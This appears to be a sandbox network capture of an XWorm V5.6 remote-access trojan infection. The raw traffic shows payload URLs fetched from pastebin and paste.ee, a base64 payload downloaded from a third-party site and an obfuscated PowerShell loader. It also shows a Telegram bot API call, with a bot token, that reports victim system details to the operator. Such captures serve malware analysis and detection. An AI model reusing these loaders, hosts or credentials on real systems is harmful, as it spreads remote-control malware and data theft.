2024-11-20 10:06:25 UTC	1369	IN	Data Raw: 93 3a e2 86 93 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 58 51 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 78 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 42 45 46 48 7a 54 57 4b 43 63 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 42 68 63 72 6c 69 43 7a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6a 51 6b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 54 42 78 67 72 68 78 45 48 46 69 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 6e 68 6b 34 65 50 2f 2f 2f 79 67 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 Data Ascii: :0C:::s:g::XQI::Dhx:g::BBEFHzTWKCc:::oTBhcrliCz::::jQk:::ETBxgrhxEHFi:C::E:nhk4eP///ygo::
2024-11-20 10:06:25 UTC	1369	IN	Data Raw: 46 52 45 57 46 68 45 57 6a 6d 6b 6f 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 38 51 4f 4d 33 39 2f 2f 38 52 42 48 73 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 45 51 30 52 45 39 59 52 46 68 45 57 6a 6d 6b 53 e2 86 93 3a e2 86 93 53 67 58 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4c 51 5a 7a 4a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 6f 52 44 68 38 6f 31 68 4d 4f 48 78 45 34 6e 76 33 2f 2f 78 45 53 46 39 59 54 45 68 45 53 45 52 45 2b 57 50 2f 2f 2f 78 45 4e 4b 43 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 44 78 38 53 4f 48 2f 39 2f 2f 38 52 42 48 73 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 45 51 67 65 31 68 45 50 47 68 49 42 4b Data Ascii: FREWFhEWjmkoKg::Ch8QOM39//8RBHsJ:::EEQ0RE9YRFhEWjmkS:SgX:::GLQZzJg::CnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCs:::oTDx8SOH/9//8RBHsJ:::EEQge1hEPGhIBK
2024-11-20 10:06:25 UTC	1369	IN	Data Raw: 86 93 48 e2 86 93 3a e2 86 93 57 4b 43 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 56 46 69 67 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 66 52 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 47 65 78 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 57 6d 68 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 33 67 34 6c 4b 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4c 4b 43 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 72 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 2b 42 69 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 5a 7a 4d 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 7a e2 86 93 3a e2 86 Data Ascii: H:WKC0:::YVFigx:::KfR8:::QGex8:::QWmh::3g4lKCw:::oLKC8:::re::b+Bio:::ZzMg::Cigz:
2024-11-20 10:06:25 UTC	1355	IN	Data Raw: e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6c e2 86 93 3a e2 86 93 4f 6c 4f e2 86 93 3a e2 86 93 51 38 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 45 7a e2 86 93 3a e2 86 93 46 e2 86 93 3a e2 86 93 49 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 63 6d 67 42 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 57 4b 43 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 4b 46 69 73 42 46 6b 55 48 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 73 Data Ascii: :B::Bl:OlO:Q8Y:::BEz:F:I8::::E:::RcmgB:H:WKC0:::YKFisBFkUH:::::g::::s

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:25 UTC	74	OUT	GET /raw/CPCMnN7k HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:06:26 UTC	388	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:26 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Wed, 20 Nov 2024 10:06:26 GMT Server: cloudflare CF-RAY: 8e57a094de604339-EWR
2024-11-20 10:06:26 UTC	52	IN	Data Raw: 32 65 0d 0a 68 74 74 70 73 3a 2f 2f 6d 61 73 63 6c 61 75 78 74 6f 69 74 75 72 65 73 2e 66 72 2f 58 36 37 68 32 30 32 34 6b 4e 57 4f 52 4d 2e 74 78 74 0d 0a Data Ascii: 2ehttps://masclauxtoitures.fr/X67h2024kNWORM.txt
2024-11-20 10:06:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:27 UTC	87	OUT	GET /X67h2024kNWORM.txt HTTP/1.1 Host: masclauxtoitures.fr Connection: Keep-Alive
2024-11-20 10:06:27 UTC	281	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:27 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Last-Modified: Mon, 04 Nov 2024 14:28:36 GMT ETag: "d558-62617199e75aa" Accept-Ranges: bytes Content-Length: 54616 Vary: Accept-Encoding Content-Type: text/plain
2024-11-20 10:06:27 UTC	7911	IN	Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-20 10:06:28 UTC	8000	IN	Data Raw: 41 44 42 41 49 41 67 45 41 55 42 51 52 5a 41 41 41 67 41 67 4f 41 41 79 42 41 41 41 49 41 49 48 41 6c 42 41 63 41 41 48 41 70 42 41 62 41 4d 45 41 67 41 77 51 41 51 46 41 43 6c 52 41 41 30 48 41 7a 41 77 4d 41 73 48 41 64 42 51 4f 41 30 43 41 78 41 67 65 41 30 43 41 68 42 67 57 41 30 43 41 42 42 77 57 41 51 56 49 42 41 67 59 41 77 46 41 39 42 51 4e 41 51 44 41 73 41 41 4d 41 51 44 41 37 42 51 58 41 6b 44 41 74 41 41 4d 41 6f 46 41 74 41 41 55 41 34 45 41 74 41 67 53 41 67 45 41 74 41 51 51 41 6f 48 41 74 41 51 59 41 73 46 41 70 41 41 65 41 41 44 41 6f 41 67 59 41 77 56 51 42 41 67 59 41 77 46 41 39 42 51 4e 41 51 44 41 73 41 67 4e 41 49 44 41 37 42 51 58 41 6b 44 41 74 41 41 4d 41 6f 46 41 74 41 41 55 41 34 45 41 74 41 67 53 41 67 45 41 74 41 51 51 41 6f Data Ascii: ADBAIAgEAUBQRZAAAgAgOAAyBAAAIAIHAlBAcAAHApBAbAMEAgAwQAQFAClRAA0HAzAwMAsHAdBQOA0CAxAgeA0CAhBgWA0CABBwWAQVIBAgYAwFA9BQNAQDAsAAMAQDA7BQXAkDAtAAMAoFAtAAUA4EAtAgSAgEAtAQQAoHAtAQYAsFApAAeAADAoAgYAwVQBAgYAwFA9BQNAQDAsAgNAIDA7BQXAkDAtAAMAoFAtAAUA4EAtAgSAgEAtAQQAo
2024-11-20 10:06:28 UTC	8000	IN	Data Raw: 5a 48 56 47 64 68 78 45 41 7a 52 32 62 6f 52 58 5a 4e 52 58 5a 48 42 51 5a 74 46 6d 54 66 52 58 5a 6e 42 77 62 6d 35 57 53 79 56 6d 59 74 56 57 54 41 4d 58 5a 77 6c 48 56 30 56 32 52 41 51 57 59 76 78 45 41 35 78 6d 59 74 56 32 63 7a 46 45 41 75 6c 57 59 74 39 47 52 30 35 57 5a 79 4a 58 64 44 39 46 64 6c 64 47 41 75 6c 57 59 74 39 47 52 77 42 58 51 41 38 6d 5a 75 6c 45 5a 76 68 47 64 6c 31 45 41 75 39 57 61 30 4e 57 5a 73 5a 57 5a 53 35 53 62 6c 52 33 63 35 4e 46 41 6e 35 57 61 79 52 33 55 30 59 54 5a 7a 46 6d 51 76 52 46 41 6c 5a 58 59 54 42 77 5a 6c 42 6e 53 66 52 58 5a 6e 42 41 64 68 31 6d 63 76 5a 55 5a 6e 46 57 62 4a 42 51 5a 6e 46 57 62 4a 64 58 59 79 52 45 41 30 6c 6d 62 56 4e 33 59 70 68 47 63 68 4a 33 52 41 34 57 5a 6c 4a 33 59 54 31 32 62 79 5a Data Ascii: ZHVGdhxEAzR2boRXZNRXZHBQZtFmTfRXZnBwbm5WSyVmYtVWTAMXZwlHV0V2RAQWYvxEA5xmYtV2czFEAulWYt9GR05WZyJXdD9FdldGAulWYt9GRwBXQA8mZulEZvhGdl1EAu9Wa0NWZsZWZS5SblR3c5NFAn5WayR3U0YTZzFmQvRFAlZXYTBwZlBnSfRXZnBAdh1mcvZUZnFWbJBQZnFWbJdXYyREA0lmbVN3YphGchJ3RA4WZlJ3YT12byZ
2024-11-20 10:06:28 UTC	8000	IN	Data Raw: 42 41 55 41 41 41 41 41 41 59 6b 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 46 6c 42 67 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 41 45 78 2f 41 6f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 4b 73 50 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 51 41 75 43 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 77 45 41 6f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 41 41 41 41 41 41 41 6f 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 66 67 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 53 41 41 43 6f 77 79 41 45 66 41 41 42 67 41 4b 73 4b 41 76 48 41 51 41 4d 51 43 6f 42 51 78 42 41 45 41 43 6b Data Ascii: BAUAAAAAAYkAABAAAAAAAAAAAAAAAEAAAAAAFlBgCAAAAAAAAAAAAAAABAAAAAEx/AoAAAAAAAAAAAAAAAQAAAAAAKsPABAAAAAAAAAAAAAAAEAAAAAQAuCQAAAAAAAAAAAAAAAABAAAAAAwEAoAAAAAAAAAAAAAAAoAAAAAAAoAABAAAAAAAAAAAAAAAEAAAfgFAAAAAAAAAAAAAAAAABAAAASAACowyAEfAABgAKsKAvHAQAMQCoBQxBAEACk
2024-11-20 10:06:28 UTC	8000	IN	Data Raw: 47 41 41 42 41 43 41 51 64 41 6b 44 41 4e 41 41 41 42 6f 41 41 51 45 67 41 41 45 48 41 35 41 51 52 41 41 41 41 31 44 41 41 42 4d 41 41 5a 42 51 4c 41 30 41 41 47 43 67 37 41 41 52 41 41 41 77 56 41 30 43 41 4e 41 67 68 41 45 4f 41 41 41 51 41 41 59 46 41 74 41 51 44 41 59 49 41 4c 44 41 41 42 45 41 41 55 42 51 4c 41 30 41 41 47 43 51 76 41 41 51 41 42 41 67 55 41 6f 43 41 4e 41 67 68 41 55 4c 41 51 45 41 41 41 41 45 41 6c 41 51 44 41 59 49 41 74 43 41 45 41 45 41 41 2b 41 51 4a 41 30 41 41 47 43 51 6f 41 41 41 41 42 41 77 4c 41 41 43 41 4e 41 67 68 41 67 4a 41 41 41 51 41 41 6f 42 41 56 41 51 44 41 59 49 41 4c 43 41 45 41 45 41 41 54 41 51 46 41 30 41 41 47 43 51 67 41 41 41 41 42 41 51 45 41 59 41 41 4e 41 41 41 41 67 48 41 51 41 51 41 41 38 41 41 46 41 Data Ascii: GAABACAQdAkDANAAABoAAQEgAAEHA5AQRAAAA1DAABMAAZBQLA0AAGCg7AARAAAwVA0CANAghAEOAAAQAAYFAtAQDAYIALDAABEAAUBQLA0AAGCQvAAQABAgUAoCANAghAULAQEAAAAEAlAQDAYIAtCAEAEAA+AQJA0AAGCQoAAAABAwLAACANAghAgJAAAQAAoBAVAQDAYIALCAEAEAATAQFA0AAGCQgAAAABAQEAYAANAAAAgHAQAQAA8AAFA
2024-11-20 10:06:28 UTC	8000	IN	Data Raw: 56 71 6f 41 41 41 63 42 4b 43 34 68 4b 45 41 41 41 70 41 59 44 66 51 41 41 41 67 43 67 4b 41 41 41 6b 37 48 42 41 41 77 4a 41 61 41 41 41 45 33 63 47 41 41 41 45 5a 67 2f 55 34 59 41 41 41 67 4b 4f 45 67 4a 30 44 67 4d 41 41 51 41 41 41 67 4b 4d 41 77 32 4a 41 67 30 41 41 41 41 41 41 41 41 4b 41 51 78 38 42 51 53 41 49 51 41 41 41 67 4b 4f 41 41 4a 68 41 77 41 41 41 41 41 41 51 54 41 41 41 41 41 71 41 67 33 4b 41 41 41 6c 67 53 44 4b 41 41 41 6a 67 53 4a 4f 34 74 43 41 41 41 4a 6f 59 68 4a 4b 41 41 41 51 6a 43 42 52 6f 41 41 41 34 38 62 58 51 51 45 4b 41 41 41 6a 2f 6d 46 45 45 68 43 41 41 67 34 76 5a 42 42 52 6f 41 41 41 45 2b 62 58 51 51 45 4b 41 41 41 67 2f 32 42 45 45 42 42 54 6f 41 41 41 38 39 63 41 34 74 43 41 41 51 4a 6f 6f 41 41 41 4d 43 4b 4d 34 Data Ascii: VqoAAAcBKC4hKEAAApAYDfQAAAgCgKAAAk7HBAAwJAaAAAE3cGAAAEZg/U4YAAAgKOEgJ0DgMAAQAAAgKMAw2JAg0AAAAAAAAKAQx8BQSAIQAAAgKOAAJhAwAAAAAAQTAAAAAqAg3KAAAlgSDKAAAjgSJO4tCAAAJoYhJKAAAQjCBRoAAA48bXQQEKAAAj/mFEEhCAAg4vZBBRoAAAE+bXQQEKAAAg/2BEEBBToAAA89cA4tCAAQJooAAAMCKM4
2024-11-20 10:06:28 UTC	6705	IN	Data Raw: 33 4b 41 41 41 6c 67 43 42 41 41 51 46 41 61 52 44 4b 41 41 41 6a 67 53 4a 55 34 4e 33 4b 41 41 41 30 38 6d 42 47 77 69 42 4b 34 74 4a 4b 41 41 41 2f 39 47 46 4b 41 41 41 45 4e 6e 42 41 41 51 4b 47 34 50 46 57 63 72 43 41 41 77 64 76 5a 67 46 4b 41 41 41 79 39 6d 42 45 41 41 41 57 34 6e 4a 4b 41 41 41 2b 39 32 46 56 51 41 41 41 59 68 66 4b 41 41 41 32 39 32 74 4f 65 67 46 48 59 67 43 41 41 67 64 76 64 72 6a 49 59 42 43 47 77 67 42 41 41 51 5a 6f 6f 41 41 41 34 42 4b 77 42 67 42 4e 4c 6e 43 41 41 51 66 6f 63 72 6a 48 73 67 42 41 41 51 62 6f 59 41 41 41 55 47 4b 43 6f 67 43 41 41 77 50 7a 42 41 41 41 59 5a 4f 45 41 41 41 56 34 6e 43 41 41 41 66 6f 55 67 45 45 45 52 42 54 59 68 43 41 41 77 65 6f 51 51 45 45 4d 42 42 41 41 41 48 2b 46 42 41 41 6f 42 41 41 41 Data Ascii: 3KAAAlgCBAAQFAaRDKAAAjgSJU4N3KAAA08mBGwiBK4tJKAAA/9GFKAAAENnBAAQKG4PFWcrCAAwdvZgFKAAAy9mBEAAAW4nJKAAA+92FVQAAAYhfKAAA292tOegFHYgCAAgdvdrjIYBCGwgBAAQZooAAA4BKwBgBNLnCAAQfocrjHsgBAAQboYAAAUGKCogCAAwPzBAAAYZOEAAAV4nCAAAfoUgEEERBTYhCAAweoQQEEMBBAAAH+FBAAoBAAA

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:29 UTC	43	OUT	GET /d/aGYNy/0 HTTP/1.1 Host: paste.ee
2024-11-20 10:06:30 UTC	1225	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:30 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 597 Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8w05kR84daDmQsIK9zTd9xuetvv%2BkCGP0uhEpN%2FcQT6%2FZJ6mr6OW2NYtLW5qtXboyOdOMNKYekY4NoKODoeH9cD6DnkD0dbvJFZRQoRJrsq6afLuHUNFBVOQeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57a0ad2e5d43b5-EWR alt-svc: h3=":443"; ma=86400
2024-11-20 10:06:30 UTC	190	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 31 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 37 33 39 39 37 26 63 77 6e 64 3d 32 32 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 64 63 30 32 39 30 36 30 30 33 61 61 63 31 63 37 26 74 73 3d 34 32 35 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1773997&cwnd=225&unsent_bytes=0&cid=dc02906003aac1c7&ts=425&x=0"
2024-11-20 10:06:30 UTC	597	IN	Data Raw: 0a 24 58 6f 68 73 4b 20 3d 20 27 25 79 7a 58 56 4d 25 27 0a 24 47 54 77 52 45 20 3d 20 27 4e 68 71 49 4d 25 4c 74 64 50 59 25 27 0a 0a 24 7a 73 62 44 74 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 24 58 6f 68 73 4b 3b 0a 0a 24 55 65 62 54 61 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 58 4b 76 48 76 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 Data Ascii: $XohsK = '%yzXVM%'$GTwRE = 'NhqIM%LtdPY%'$zsbDt = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + $XohsK;$UebTa = ':';$XKvHv = 'A';$WYvtt = '%qlxKP%'.replace( $UebTa, $XKvHv );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:32 UTC	74	OUT	GET /raw/GF0ptUGb HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:06:32 UTC	391	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Wed, 20 Nov 2024 10:06:32 GMT Server: cloudflare CF-RAY: 8e57a0ba9e166a4e-EWR
2024-11-20 10:06:32 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-11-20 10:06:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:38 UTC	447	OUT	GET /bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1F61296E2D13B1021028%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20WG6__62%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-20 10:06:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 20 Nov 2024 10:06:38 GMT Content-Type: application/json Content-Length: 466 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 10:06:38 UTC	466	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 31 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 36 33 32 31 32 37 32 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 79 58 77 6f 72 6d 52 61 74 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 79 58 77 6f 72 6d 52 61 74 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 38 38 30 33 38 38 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6e 65 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 55 43 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6e 65 79 4c 75 63 6b 30 30 37 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 30 Data Ascii: {"ok":true,"result":{"message_id":9122,"from":{"id":6063212727,"is_bot":true,"first_name":"MyXwormRat_Bot","username":"MyXwormRatBot"},"chat":{"id":1188038887,"first_name":"Money","last_name":"LUCK","username":"MoneyLuck007","type":"private"},"date":17320

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:39 UTC	74	OUT	GET /raw/GF0ptUGb HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:06:39 UTC	395	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:39 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 7 Last-Modified: Wed, 20 Nov 2024 10:06:32 GMT Server: cloudflare CF-RAY: 8e57a0e85a4980da-EWR
2024-11-20 10:06:39 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-11-20 10:06:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:47 UTC	74	OUT	GET /raw/GF0ptUGb HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:06:47 UTC	396	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:47 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 15 Last-Modified: Wed, 20 Nov 2024 10:06:32 GMT Server: cloudflare CF-RAY: 8e57a11a084a42e9-EWR
2024-11-20 10:06:47 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-11-20 10:06:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:55 UTC	74	OUT	GET /raw/GF0ptUGb HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:06:56 UTC	396	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:56 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 24 Last-Modified: Wed, 20 Nov 2024 10:06:32 GMT Server: cloudflare CF-RAY: 8e57a150190e186d-EWR
2024-11-20 10:06:56 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-11-20 10:06:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:07:07 UTC	74	OUT	GET /raw/GF0ptUGb HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-20 10:07:08 UTC	396	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:07:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 36 Last-Modified: Wed, 20 Nov 2024 10:06:32 GMT Server: cloudflare CF-RAY: 8e57a19b6c4841d5-EWR
2024-11-20 10:07:08 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
